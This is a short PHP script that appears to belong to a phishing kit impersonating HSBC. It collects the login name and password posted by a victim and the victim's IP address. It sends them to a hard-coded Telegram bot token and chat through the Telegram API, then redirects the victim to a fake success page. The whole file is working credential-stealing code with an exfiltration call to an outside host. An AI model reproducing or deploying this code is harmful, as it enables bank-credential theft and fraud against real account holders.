<?php
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
if(!empty($_POST['ident'])){
$message  = "=========[ HSBC INFO ]=========\n";
$message .= "log  : ".$_POST['ident']."\n";
$message .= "pass : " . $_POST['pass']. "\n";
$message .= "===============[IP]==============\n";
$message .= "IP : http://www.geoiptool.com/?IP=$ip\n";
$message .= "==========[ HSBC  INFO]=========";
        $token = "6384881610:AAFCma01A350PHgZD4PsMnZXiDisgHADguw";
    file_get_contents("https://api.telegram.org/bot$token/sendMessage?chat_id=-4263630620&text=" . urlencode($message)."" );
header("Location:../success.php");
}else{
header("Location:../success.php");
}

?>